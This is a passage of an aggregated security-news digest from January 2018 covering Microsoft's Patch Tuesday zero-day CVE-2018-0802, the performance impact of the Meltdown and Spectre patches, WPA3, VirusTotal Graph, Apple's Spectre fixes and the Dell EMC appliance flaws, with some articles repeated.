(MitM) attack from an already-compromised machine in the local network, ➋ a compromised gateway or proxy of the organization, ➌ a MitM attack at the Internet Service Provider (ISP) level or ➍ a Border Gateway Protocol (BGP) hijack to redirect the traffic to Turla-controlled servers a MitM attack at the Internet Service Provider (ISP) level or ➍ a Border Gateway Protocol (BGP) hijack to redirect the traffic to Turla-controlled servers.”

Turla%20APT%20group%20Adobe

Researchers believe the most likely scenario sees attackers controlling the router for the traffic hijacking.

Such kind of attack is any way possible because the files are downloaded via HTTP, for this reason, it is important to avoid installing any update or software that was downloaded through unsecured connections.

Administrators must also check that Flash Player installers downloaded are properly signed with a valid Adobe certificate.

Further information, including the IOCs are included in the report published by ESET.


January 2018 Patch Tuesday security updates fix a zero-day vulnerability in MS Office
10.1.2018 securityaffairs
Vulnerebility

Microsoft has released the January 2018 Patch Tuesday security updates, containing fixes for 56 vulnerabilities including the zero-day vulnerability CVE-2018-0802 in MS Office.
Microsoft has released the January 2018 Patch Tuesday security updates, containing fixes for 56 vulnerabilities including a zero-day vulnerability in MS Office. 16 security updates are rated as critical, 38 as important, 1 is rated moderate, and 1 is rated as low in severity. The security updates fix security vulnerabilities in Windows, Office, Internet Explorer, ChakraCore, Edge, ASP.NET, and the .NET Framework.

The January 2018 Patch Tuesday includes three special security advisories that address flaws related to Adobe Flash, Meltdown & Spectre vulnerabilities, an update for Office suite.

The zero-day vulnerability is a memory corruption flaw in Office tracked as CVE-2018-0802, in the past few months it had been actively exploited by multiple attackers in the wild. The vulnerability can be exploited for remote code execution by tricking the victim into opening a specially crafted malicious Word file in MS Office or WordPad.

The flaw was discovered by several experts from Tencent, Qihoo 360, ACROS Security’s 0Patch Team, and Check Point Software Technologies.

Security firm Check Point has published a detailed analysis of the flaw in a blog post including a video PoC of its exploitation.

The flaw is related the memory-corruption issue CVE-2017-11882 that affects all versions of Microsoft Office released in the past 17 years, it resides in the Equation Editor functionality (EQNEDT32.EXE) and was addressed by Microsoft in November.

The analysis of the flaw CVE-2017-11882 allowed the researchers at 0Patch to discover the CVE-2018-0802 fixed in the January 2018 Patch Tuesday.

Microsoft also addressed nine remote code execution and memory disclosure vulnerabilities in MS Office.

Microsoft also addressed an X509 certificate validation bypass vulnerability tracked as CVE-2018-0786 in .NET Framework (and .NET Core) that could be exploited by threat actors to show their invalid certificates as valid.

“Microsoft is aware of a security vulnerability in the public versions of .NET Core where an attacker could present a certificate that is marked invalid for a specific use, but a component uses it for that purpose. This action disregards the Enhanced Key Usage tagging.” states Microsoft.

The January 2018 Patch Tuesday also addresses a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer, the flaws could be exploited by a remote attacker for code execution by tricking the victim into opening a specially-crafted webpage that triggers a memory corruption error.

Finally, Microsoft also patched a flaw in Outlook for Mac (CVE-2018-0819, aka Mailsploit attack) that could be exploited by attackers to send emails with spoofed identities.


Microsoft, Intel Share Data on Performance Impact of CPU Flaw Patches
10.1.2018 securityweek
Vulnerebility
Microsoft and Intel have shared more information on the performance impact of the patches released for the recently disclosed attack methods known as Spectre and Meltdown.

The Spectre and Meltdown exploits work on systems using CPUs from Intel, AMD and ARM, and they allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Patches and workarounds have been released by both hardware and software vendors, but they may introduce significant performance penalties.

Intel has insisted that average computer users – owners of typical home and business PCs – should not see any significant impact on performance during common tasks, such as reading emails, viewing photos or writing documents. Benchmark tests conducted by the company using SYSmark 2014 showed an impact of 6 percent or less for 8th Generation Core platforms with solid state storage.

All but two of currently supported Intel processors are said to be affected by the Spectre and Meltdown vulnerabilities. However, a technology called PCID (Process-Context Identifiers), which is present in newer processors, should lessen impact on performance.

Intel says it has yet to “build a complete picture of the impact on data center systems,” but points to statements from major vendors who have conducted tests.

Shortly after applying the Meltdown and Spectre patches to its Azure cloud platform, Microsoft said it had not seen any noticeable performance impact. The company noted that some users may experience networking performance impact, but that can be addressed using the Azure Accelerated Networking feature.

After conducting more tests, Microsoft pointed out that mitigations for Meltdown (CVE-2017-5754) and one of the Spectre flaws (CVE-2017-5753) have minimal performance impact, but the remediation for the second Spectre vulnerability (CVE-2017-5715) does introduce more significant performance penalties.

Specifically, Microsoft found that users running Windows 10 on newer chips (2016-era PCs with Skylake, Kabylake or newer CPUs) should not notice any slowdowns. While there are some single-digit performance penalties, they are reflected in milliseconds.

On the other hand, when running Windows 10, Windows 8 or Windows 7 on devices with older chips (2015-era PCs with Haswell or older CPUs), benchmark tests showed more significant penalties and users may actually notice a decrease in performance. On Windows 10, only some users should experience slowdowns, but on older versions of the operating system most users are expected to notice performance issues.

In the case of Windows Server, regardless of what type of chip is used, a more significant performance impact is expected after mitigations are applied, particularly in the case of IO-intensive applications. In the case of Windows Server, Microsoft has actually advised users to evaluate the risk of untrusted code running on their machines and “balance the security versus performance tradeoff” for their specific environment.

“For context, on newer CPUs such as on Skylake and beyond, Intel has refined the instructions used to disable branch speculation to be more specific to indirect branches, reducing the overall performance penalty of the Spectre mitigation. Older versions of Windows have a larger performance impact because Windows 7 and Windows 8 have more user-kernel transitions because of legacy design decisions, such as all font rendering taking place in the kernel,” Microsoft explained.

Red Hat has also reported seeing measurable performance impact, ranging between 8 and 19 percent, for operations involving highly cached random memory.

Amazon said it had not observed any significant performance impact for the overwhelming majority of EC2 workloads, but some AWS customers have complained about degraded performance after the patches were applied starting with December.

Apple, which started performing tests after releasing updates in December, also said it had not seen any measurable reduction in the performance of macOS and iOS. Google also claimed to have observed negligible impact on performance after applying mitigations to its own systems.

Epic Games informed users recently that the CPU usage of its backend cloud services increased significantly after Meltdown mitigations were applied, which led to login issues and service instability.


Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day
10.1.2018 thehackernews 
Vulnerebility
If you think that only CPU updates that address this year's major security flaws—Meltdown and Spectre—are the only ones you are advised to grab immediately, there are a handful of major security flaws that you should pay attention to.
Microsoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office related that had been actively exploited by several threat groups in the wild.
Sixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework.
The zero-day vulnerability (CVE-2018-0802), described by Microsoft as a memory corruption flaw in Office, is already being targeted in the wild by several threat actor groups in the past few months.
The vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad.
According to the company, this security flaw is related to CVE-2017-11882—a 17-year-old vulnerability in the Equation Editor functionality (EQNEDT32.EXE), which Microsoft addressed in November.
When researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a blog post published by Check Point.
Besides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office.
A spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for MAC, which has been listed as publicly disclosed (Mailsploit attack), has also addressed by the company. The vulnerability does not allow some versions Outlook for Mac to handle the encoding and display of email addresses properly, causing antivirus or anti-spam scanning not to work as intended.
Microsoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid.
"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose," describes Microsoft. "This action disregards the Enhanced Key Usage taggings."
The company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer.
All these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet.
Meanwhile, Adobe has patched a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild.
Users are strongly advised to apply October security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.
For installing security updates, simply head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Microsoft Patches Zero-Day Vulnerability in Office
10.1.2018 securityweek
Vulnerebility
Microsoft’s January 2018 Patch Tuesday updates address more than 50 vulnerabilities, including a zero-day vulnerability in Office related to an Equation Editor flaw that has been exploited by several threat groups in the past few months.

The zero-day vulnerability, tracked as CVE-2018-0802, has been described by Microsoft as a memory corruption issue that can be exploited for remote code execution by getting targeted users to open a specially crafted file via Office or WordPad.

Microsoft has credited several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security’s 0Patch Team, and experts from Check Point Software Technologies for finding the flaw.

The security hole is related to CVE-2017-11882, a 17-year-old vulnerability in the Equation Editor (EQNEDT32.EXE), which the vendor addressed with the November 2017 Patch Tuesday updates. Based on how the patch was developed, experts believe Microsoft may have lost the application’s source code, which forced it to somehow patch the executable file directly.

Microsoft replaced the Equation Editor component in Office 2007, but kept the old one as well for compatibility reasons. The problematic component has now been removed from Office.

0Patch researchers have been analyzing CVE-2017-11882, which has likely led them to discovering a new, related vulnerability. Check Point has published a blog post with the details of CVE-2018-0802 and showed how an exploit works, but they have not mentioned any attacks.

This suggests that the Chinese researchers may have been the ones who spotted the vulnerability being exploited in attacks. This would not be the first time experts at Qihoo 360 witnessed the exploitation of an Office zero-day. Back in October, after Microsoft released a patch, they reported seeing CVE-2017-11826 being leveraged to deliver malware.

If CVE-2018-0802 is related to CVE-2017-11882, there is a long list of threat actors who may be exploiting it. CVE-2017-11882 has been exploited by Iranian cyberspies, the Cobalt hacking group, someone who uses TelegramRAT, and likely others.

Microsoft’s Patch Tuesday updates also address a spoofing vulnerability in Office for Mac that has already been publicly disclosed. Sixteen of the flaws resolved this month have been rated critical, a majority affecting the scripting engine used by the Edge and Internet Explorer web browsers.

Microsoft has also rated critical a Word vulnerability (CVE-2018-0797) that can be exploited for remote code execution using specially crafted RTF files.

Adobe’s Patch Tuesday updates for this month patch only one information disclosure vulnerability in Flash Player.


VirusTotal announced the availability of a visualization tool, dubbed VirusTotal Graph, designed to help with malware analysis.

10.1.2018 securityweek Virus
The VirusTotal Graph should allow investigators working with multiple reports at the same time, to try to pivot between multiple data points (files, URLs, domains and IP addresses). The observation of the connections across different samples of malware could allow investigators to collect more events from different cases.

“VirusTotal receives a large number of files and URLs every day, and each of them is analyzed by AVs and other tools and sandboxes to extract information about them. This information is critical for our ecosystem, as it connects the dots and makes clear the connections between entities.” states VirusTotal.

“It is common to pivot over many data points (files, URLs, domains and IP addresses) to get the full picture of your investigation, and this usually involves looking at multiple reports at the same time. We know this can be complicated when you have many open tabs, therefore, we’ve developed VirusTotal Graph.”

The tool VirusTotal Graph is based on VirusTotal’s data set and was designed to visualize them in a single graphical interface relationship between files, URLs, domains and IP addresses. The graph is navigable, making easier for malware researchers the investigation of malicious codes.

Virus%20Total%20Graph

Analysts can build their own network by exploring and expanding each of the nodes in the graph.

The tool includes a search box, node summary section, node expansion section that allows correlation of the information from more entities, node action menu, detection dropdown, and a node list.

VirusTotal also allows users to save the graphs they generated, as well as to share their findings with other users. All saved graphs are public and also linked in VirusTotal public reports of files, URLs, IP addresses or domains that appear in the graph.

“We feel the community will benefit from this intelligence. We understand that there are scenarios where a higher degree of privacy is needed, and we are working on a solution — expect to see some news around it soon,” VirusTotal concludes.

The complete documentation is available at
https://support.virustotal.com/hc/en-us/articles/115005002585-VirusTotal-Graph.
Virus Total also published two videos that shows main features implemented in the tool.


Microsoft: Meltdown and Spectre patches could cause noticeable performance slowdowns
10.1.2018 securityaffairs
Vulnerebility

Microsoft officially confirmed that Meltdown and Spectre patches could cause noticeable performance slowdowns contrary to what initially thought.
Just after the disclosure of the Meltdown and Spectre vulnerabilities, many security experts argued that forthcoming patches will have a significant impact on the performance (30% degradation), but Intel pointed out that average users will not notice any difference.

“Intel continues to believe that the performance impact of these updates is highly workload-dependent and, for the average computer user, should not be significant and will be mitigated over time.” continues Intel.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact.”

Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from security updates did not reveal negative effects.

Unfortunately, someone has underestimated the problem and Microsoft Windows patches for the CPU flaws will cause noticeable performance degradation, with most severe impact on Windows servers as well as Windows 7 and 8 client machines.

Microsoft published a blog post that confirmed that Windows servers will experience noticeable performance slowdowns, as will Windows 7 and 8 client machines running older processors (2015-timeframe PCs with Haswell or older CPUs).

The good news is that newer Windows 10 platforms won’t experience perceptible performance degradation.

Below Microsoft’s findings related to performance degradation caused by the installation of Meltdown/Spectre patches.

With Windows 10 on newer silicon (2016-era PCs with Skylake, Kabylake or newer CPU), benchmarks show single-digit slowdowns, but we don’t expect most users to notice a change because these percentages are reflected in milliseconds.
With Windows 10 on older silicon (2015-era PCs with Haswell or older CPU), some benchmarks show more significant slowdowns, and we expect that some users will notice a decrease in system performance.
With Windows 8 and Windows 7 on older silicon (2015-era PCs with Haswell or older CPU), we expect most users to notice a decrease in system performance.
Windows Server on any silicon, especially in any IO-intensive application, shows a more significant performance impact when you enable the mitigations to isolate untrusted code within a Windows Server instance. This is why you want to be careful to evaluate the risk of untrusted code for each Windows Server instance, and balance the security versus performance tradeoff for your environment.
Microsoft announced it is working to solve the problem and the situation appears critical for Windows servers.

Microsoft has patched 41 of its 45 Windows versions and is going to release the remaining four issues as soon as possible.

Microsoft requires entire industry to work together to find the best possible solutions for customers affected by vulnerabilities like Spectre and Meltdown.


WPA3 to Bring Improved Wireless Security in 2018
9.1.2018 secrityweek Safety
Wi-Fi Alliance Announces WPA3, the Successor to Wi-Fi's WPA2 Security Protocol

The Wi-Fi Alliance -- comprising 15 major sponsor members (including Apple, Cisco, Dell, Intel, Microsoft, Qualcomm and more) and hundreds of contributing members -- has announced that WPA3 will be introduced during 2018.

WPA3 is not an immediate replacement for WPA2, which will continue to be maintained and enhanced. In particular, the Alliance will introduce new testing enhancements for WPA2 to reduce the potential for vulnerabilities caused by network misconfigurations; and will further safeguard managed networks with centralized authentication services.

New Wi-Fi Alliance WPA3 certified devices will take some time to filter into widespread use. Use of the new specification will require WPA3 devices and WPA3 routers -- and since the vast majority of home wi-fi users never buy a router but use the one supplied by their ISP, many users won't become WPA3 compatible before they change ISPs. That could take several years.

WPA3 Security ProtocolNevertheless, there are some welcome enhancements over the WP2 specification that has kept users largely, but not entirely, protected for around two decades.

Four new capabilities for both personal and enterprise networks have been announced. There are no technical details in the Wi-Fi announcement, leading to some conjecture over exactly how they will be introduced.

The first will be to provide "robust protections" even when the user fails to use a strong password. Mathy Vanhoef, the researcher who discovered the KRACK WPA2 vulnerability, has suggested on Twitter, "That means dictionary attacks no longer work. The handshake they're referring to is likely Simultaneous Authentication of Equals (SAE). Which is also called Dragonfly;" adding, "The standards behind WPA3 already existed for a while. But now devices are *required* to support them, otherwise they're won't receive the "WPA3-certified" label."

The second will simplify the process of configuring security on wi-fi devices that have limited or no display interface. The obvious use will be for small personal devices, like wearables such as smart watches -- but it could also play some role in improving the future security of the industrial internet of things.

The third will improve the security of open wi-fi hotspots -- such as cafes, hotels and airport lounges -- by giving each user individualized data encryption. On this, Vanhoef commented, "This might refer to Opportunistic Wireless Encryption: encryption without authentication." It won't make the use of wi-fi hotspots completely secure, but should go some way to reassuring security officers who know that corporate employees work from hotspots while traveling.

The fourth will be a 192-bit security suite aligned with the Commercial National Security Algorithm (CNSA) Suite, that will further protect wi-fi networks with higher security requirements; such as government, defense, and industrial.

We can expect that new WPA3 devices will start to appear over the next few months -- particularly since many of the manufacturers will be members of the Alliance. However, the devices will need wait for the launch of the Wi-Fi Alliance's formal certification process before they can be truly called such. The Wi-Fi Certified designation will be important to reassure buyers.

"Security is a foundation of Wi-Fi Alliance certification programs, and we are excited to introduce new features to the Wi-Fi CERTIFIED family of security solutions," commented Edgar Figueroa, president and CEO of Wi-Fi Alliance. "The Wi-Fi CERTIFIED designation means Wi-Fi devices meet the highest standards for interoperability and security protections."


Microsoft Suspends CPU Flaw Patches for AMD Devices
9.1.2018 secrityweek
Vulnerebility
Microsoft Will Not Deliver Security Updates to Devices With Incompatible Antiviruses

Users whose computers have AMD processors no longer receive the recent Windows updates designed to patch the Meltdown and Spectre vulnerabilities, and Microsoft has warned that some systems may not receive upcoming security updates if the antivirus running on them has not set a specific registry key.

Several individuals whose devices are powered by some AMD processors, particularly older models, complained that they had been unable to boot Windows 10 after installing KB4056892, an update released by Microsoft in response to flaws affecting Intel, AMD and ARM processors.

Many of those affected said their operating system froze during boot. Those who managed to restore their systems by reverting to a previous state needed to quickly disable automatic updates to prevent the patch from being reinstalled.

Some of the impacted users pointed out that since the risk of attacks against AMD CPUs is said to be low, they can wait for proper updates from Microsoft.

Microsoft has confirmed the issue, explaining that “some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown.”

The tech giant has decided to temporarily pause Windows updates to devices with impacted AMD processors. For those who have already installed the updates and are experiencing problems, Microsoft has provided some recommendations on how to fix the issue.

Microsoft’s advice for Windows 10 users includes starting the computer in safe mode and uninstalling recent updates, or restoring the system to an earlier point. Several users have complained, however, that they get an error when attempting to restore the system.

In addition to causing problems to Windows, the Spectre and Meltdown updates from Microsoft also break some applications, including the PulseSecure VPN and an Asus utility.

Security updates will not be delivered to devices with incompatible antiviruses

When Microsoft first released the updates designed to prevent Spectre and Meltdown attacks, the company warned that it had identified compatibility issues with some security products. It informed users that if they had not been offered the security updates, it may have been due to the failure of their antivirus to create a specific registry key.

Microsoft later also informed users that they may not receive any future security updates if their antivirus vendor does not address the problem.

Researcher Kevin Beaumont has been keeping track of which security vendors have implemented this requirement. As of Monday, a majority of firms had either released automatic fixes or made available instructions on how to manually create the required registry. The remaining vendors are working on fixes.

Microsoft noted that users who don’t rely on any antivirus will also need to manually create the registry key.

The role of the registry key is to prevent blue screen of death (BSOD) errors triggered due to compatibility issues when security products make unsupported calls to the Windows kernel memory. Microsoft says the requirement for the registry key will remain in place until the company is confident that a majority of consumers will not experience crashes due to the security updates.


Adobe Patch Tuesday Updates Fix Only One Flash Player Flaw
9.1.2018 secrityweek
Vulnerebility
Adobe’s Patch Tuesday updates for January 2018 resolve only an information disclosure vulnerability affecting Flash Player.

The flaw is tracked as CVE-2018-4871, it has been classified as “important,” and it has been assigned a priority rating of 2, which means it’s unlikely to be exploited in malicious attacks any time soon.

The security hole has been described as an out-of-bounds read issue that can lead to information exposure. It affects Flash Player 28.0.0.126 and earlier on Windows, Mac, Linux and Chrome OS, and it has been patched with the release of version 28.0.0.137. The patch will also be included in the next Chrome release and Microsoft’s Patch Tuesday updates.

Adobe says it has learned about the vulnerability from an anonymous researcher via Trend Micro’s Zero Day Initiative (ZDI).

The number of vulnerabilities discovered by researchers in Flash Player has dropped significantly in the past months after Adobe announced its intention to kill the application by 2020.

However, malicious actors are still finding and exploiting zero-day vulnerabilities in Flash. In October, shortly after Adobe announced that it had no Patch Tuesday updates, the company was forced to quickly release a fix for Flash Player after learning that a cyber espionage group from the Middle East had been leveraging a zero-day to deliver spyware.

The same vulnerability was later exploited by the Russia-linked group APT28 (also known as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team) in attacks aimed at government organizations and aerospace companies. Fortunately, this was apparently the only Flash Player zero-day exploited in 2017.


VirusTotal Launches Visualization Tool
9.1.2018 secrityweek Security
VirusTotal this week announced the availability of a visualization tool designed to help with malware investigations.

Dubbed VirusTotal Graph, the new tool is available at https://www.virustotal.com/graph/ or through a public report in the tool section (which requires a VirusTotal login).

The tool should make it easier for investigators who are working with multiple reports at the same time, attempting to pivot between multiple data points (files, URLs, domains and IP addresses), as such work would normally result in having multiple tabs opened, which could complicate operations.

“VirusTotal receives a large number of files and URLs every day, and each of them is analyzed by AVs and other tools and sandboxes to extract information about them. This information is critical for our ecosystem, as it connects the dots and makes clear the connections between entities,” VirusTotal notes.

Built on top of VirusTotal’s data set, the new tool was designed to “understand the relationship between files, URLs, domains and IP addresses” and to bring the necessary information on these five entity types (relationships are included) together on a single interface, thus making it easier to navigate.

Some of the features available for users include a search box (it even supports multiple indicators of compromise, via a Multi-entity search section), node summary section (summarizes the more relevant information), node expansion section (to correlate information from more than one entity), node action menu, detection dropdown (shows the number of AV detections), and node list (shows the list of all nodes in the panel).

The key elements of the VirusTotal Graph user interface will provide investigators not only with the most relevant information at a glance when clicking on a node, but also with the option to explore and expand each of the nodes in their graph, and build a network and observe connections across samples. Zooming in or out on a graph is also possible.

VirusTotal also allows users to save the graphs so they can access them at any time, as well as to share their findings with other users (generating permalinks to the graph is also possible). VirusTotal makes all saved graphs public and also linked in VirusTotal public reports of files, URLs, IP addresses or domains that appear in the graph.

Furthermore, with the help of VirusTotal Public or VirusTotal Intelligence report, users will be able to add labels and access in-depth reports.

“We feel the community will benefit from this intelligence. We understand that there are scenarios where a higher degree of privacy is needed, and we are working on a solution -- expect to see some news around it soon,” VirusTotal concludes.

Additional information on the new tool is available on VirusTotal’s support page and in two YouTube videos providing tutorials on Files and Domains.


Wi-Fi Alliance launches WPA2 enhancements and announced WPA3
9.1.2018 secrityaffairs Safety

The Wi-Fi Alliance introduced several key improvements to the Wi-Fi Protected Access II (WPA2) security protocol and announced its successor WPA3.Wi-Fi security will be dramatically improved with the introduction of the WPA3 protocol.
The arrival of WPA3 protocol was announced on Monday by the Wi-Fi Alliance, it is the successor of WPA2 protocol for the security of Wi-Fi communication.

WPA3 will build on the core components of WPA2, anyway, the alliance plans to roll out three enhancements for WPA2 in the first part of the year.

“Wi-Fi Alliance is launching configuration, authentication, and encryption enhancements across its portfolio to ensure Wi-Fi CERTIFIED devices continue to implement state of the art security protections.” reads the announcement published by the Wi-Fi Alliance.

“Four new capabilities for personal and enterprise Wi-Fi networks will emerge in 2018 as part of Wi-Fi CERTIFIED WPA3”

The WPA2 is known to be vulnerable to KRACK attacks and DEAUTH attacks. The three key enhancements to the WPA2 protocol will address authentication, encryption, and configuration issues.

The Wi-Fi Alliance includes tech giants like Apple, Cisco, Intel, Qualcomm, and Microsoft it announced WPA3-certified devices for later 2018. They will include two features to improve protection when users choose weak passwords and simplify the choice of proper security settings on devices with limited or no interface screens.

wpa3

Another feature will strengthen user privacy in open networks by using individualized data encryption. The last feature is a 192-bit security suite, aligned with the Commercial National Security Algorithm (CNSA) Suite from the Committee on National Security Systems, that will ensure the protection of Wi-Fi networks with higher security requirements such as government and defense.

“Security is a foundation of Wi-Fi Alliance certification programs, and we are excited to introduce new features to the Wi-Fi CERTIFIED family of security solutions,” concluded Edgar Figueroa, president and CEO of Wi-Fi Alliance. “The Wi-Fi CERTIFIED designation means Wi-Fi devices meet the highest standards for interoperability and security protections.”

Further information will be made available once the WPA3 program will be launched.


Apple released patches to fix Spectre flaws in Safari, macOS, and iOS
9.1.2018 secrityaffairs Apple

Apple released iOS 11.2.2 software, a macOS High Sierra 10.13.2 supplemental update, and Safari 11.0.2 to fix Spectre flaws.
On Monday, Apple released patches to fix Spectre flaws in Safari, macOS, and iOS, the tech giant released iOS 11.2.2 software a macOS High Sierra 10.13.2 supplemental update. The patches also fixed vulnerabilities in Apple WebKit, the web browser engine used by Safari, Mail, and App Store.

The security updates issued by Apple aim to mitigate the two known methods for exploiting Spectre identified as “bounds check bypass” (CVE-2017-5753/Spectre/v1) and “branch target injection” (CVE-2017-5715/Spectre/v2).

Just after the disclosure of the Meltdown and Spectre attacks, Apple released security updates (iOS 11.2, macOS and tvOS 11.2) to protect its systems against Meltdown attacks.

Apple now released the following security updates:

macOS High Sierra 10.13.2 supplemental;
Safari 11.0.2 that is available for OS X El Capitan 10.11.6 and macOS Sierra 10.12.6;
iOS 11.2.2 available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation;
After the disclosure of the flaws, security experts pointed out that the Spectre vulnerability is very hard to patch, but fortunately, the exploitation is much more difficult than Meltdown.

Another worrisome aspect of the Spectre attacks is that it breaks the isolation between different applications opening the door to remote attacks, for example, an attacker can remotely bypass sandboxing mechanism implemented by modern browsers.


Microsoft Suspends CPU Flaw Patches for AMD Devices
9.1.2018 securityweek
Vulnerebility
Microsoft Will Not Deliver Security Updates to Devices With Incompatible Antiviruses

Users whose computers have AMD processors no longer receive the recent Windows updates designed to patch the Meltdown and Spectre vulnerabilities, and Microsoft has warned that some systems may not receive upcoming security updates if the antivirus running on them has not set a specific registry key.

Several individuals whose devices are powered by some AMD processors, particularly older models, complained that they had been unable to boot Windows 10 after installing KB4056892, an update released by Microsoft in response to flaws affecting Intel, AMD and ARM processors.

Many of those affected said their operating system froze during boot. Those who managed to restore their systems by reverting to a previous state needed to quickly disable automatic updates to prevent the patch from being reinstalled.

Some of the impacted users pointed out that since the risk of attacks against AMD CPUs is said to be low, they can wait for proper updates from Microsoft.

Microsoft has confirmed the issue, explaining that “some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown.”

The tech giant has decided to temporarily pause Windows updates to devices with impacted AMD processors. For those who have already installed the updates and are experiencing problems, Microsoft has provided some recommendations on how to fix the issue.

Microsoft’s advice for Windows 10 users includes starting the computer in safe mode and uninstalling recent updates, or restoring the system to an earlier point. Several users have complained, however, that they get an error when attempting to restore the system.

In addition to causing problems to Windows, the Spectre and Meltdown updates from Microsoft also break some applications, including the PulseSecure VPN and an Asus utility.

Security updates will not be delivered to devices with incompatible antiviruses

When Microsoft first released the updates designed to prevent Spectre and Meltdown attacks, the company warned that it had identified compatibility issues with some security products. It informed users that if they had not been offered the security updates, it may have been due to the failure of their antivirus to create a specific registry key.

Microsoft later also informed users that they may not receive any future security updates if their antivirus vendor does not address the problem.

Researcher Kevin Beaumont has been keeping track of which security vendors have implemented this requirement. As of Monday, a majority of firms had either released automatic fixes or made available instructions on how to manually create the required registry. The remaining vendors are working on fixes.

Microsoft noted that users who don’t rely on any antivirus will also need to manually create the registry key.

The role of the registry key is to prevent blue screen of death (BSOD) errors triggered due to compatibility issues when security products make unsupported calls to the Windows kernel memory. Microsoft says the requirement for the registry key will remain in place until the company is confident that a majority of consumers will not experience crashes due to the security updates.


Apple released patches to fix Spectre flaws in Safari, macOS, and iOS
9.1.2018 securityaffairs Apple

Apple released iOS 11.2.2 software, a macOS High Sierra 10.13.2 supplemental update, and Safari 11.0.2 to fix Spectre flaws.
On Monday, Apple released patches to fix Spectre flaws in Safari, macOS, and iOS, the tech giant released iOS 11.2.2 software a macOS High Sierra 10.13.2 supplemental update. The patches also fixed vulnerabilities in Apple WebKit, the web browser engine used by Safari, Mail, and App Store.

The security updates issued by Apple aim to mitigate the two known methods for exploiting Spectre identified as “bounds check bypass” (CVE-2017-5753/Spectre/v1) and “branch target injection” (CVE-2017-5715/Spectre/v2).

Just after the disclosure of the Meltdown and Spectre attacks, Apple released security updates (iOS 11.2, macOS and tvOS 11.2) to protect its systems against Meltdown attacks.

Apple now released the following security updates:

macOS High Sierra 10.13.2 supplemental;
Safari 11.0.2 that is available for OS X El Capitan 10.11.6 and macOS Sierra 10.12.6;
iOS 11.2.2 available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation;
After the disclosure of the flaws, security experts pointed out that the Spectre vulnerability is very hard to patch, but fortunately, the exploitation is much more difficult than Meltdown.

Another worrisome aspect of the Spectre attacks is that it breaks the isolation between different applications opening the door to remote attacks, for example, an attacker can remotely bypass sandboxing mechanism implemented by modern browsers.


Apple Adds Spectre Protections to Safari, WebKit
9.1.2018 securityweek
Vulnerebility
Updates released by Apple on Monday for iOS, macOS and Safari should mitigate the effects of the vulnerabilities exploited by the recently disclosed attack method named Spectre.

Apple informed customers that iOS 11.2.2 and macOS High Sierra 10.13.2 Supplemental Update include security improvements for Safari and WebKit. The Safari improvements are also included in version 11.0.2 of Apple’s web browser.

The latest updates address the Spectre vulnerabilities, specifically CVE-2017-5753 and CVE-2017-5715. Mitigations for the Meltdown attack were rolled out by Apple, before the flaws were disclosed, with the release of iOS 11.2, macOS 10.13.2 and tvOS 11.2. Apple Watch is not vulnerable to either of the attack methods.

Apple’s analysis showed that the Spectre vulnerabilities “are extremely difficult to exploit,” even by a local app running on iOS or macOS, but the company warned that remote exploitation via JavaScript running in the browser is possible.

“Our current testing indicates that the upcoming Safari mitigations will have no measurable impact on the Speedometer and ARES-6 tests and an impact of less than 2.5% on the JetStream benchmark,” Apple said last week.

Apple believes the Meltdown technique, which relies on a vulnerability tracked as CVE-2017-5754, has the most potential for exploitation.

Meltdown and Spectre can be used by malicious actors to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information.

The attacks work against devices with Intel, AMD and ARM processors. Intel has been hit the hardest, while AMD claims the risk of attacks is low and ARM found that only ten of its CPUs are impacted.

Patches and workarounds have already been released by several major vendors, but they can introduce significant performance penalties, and Microsoft’s updates may also break Windows and various apps.


Dell EMC fixes 3 zero-day vulnerabilities in Data Protection Appliance products
9.1.2018 securityaffairs
Vulnerebility

Dell EMC informed its customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products are affected by 3 zero-day flaws.
Dell EMC informed its customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products are affected by vulnerabilities that can be chained by an attacker to take complete control of a target system.

The flaws reside in the Avamar Installation Manager (AVI) component that is present in all the products.

The vulnerabilities were discovered by the experts at the consultancy firm Digital Defense Inc, the three issues included:

An Authentication Bypass in SecurityService; an
Authenticated Arbitrary File Access in UserInputService; and an
Authenticated File Upload in UserInputService.
Dell published a security advisory is ESA-2018-001, that could be accessible by customers having Dell EMC Online Support credentials.

Dell EMC Data Protection Appliance

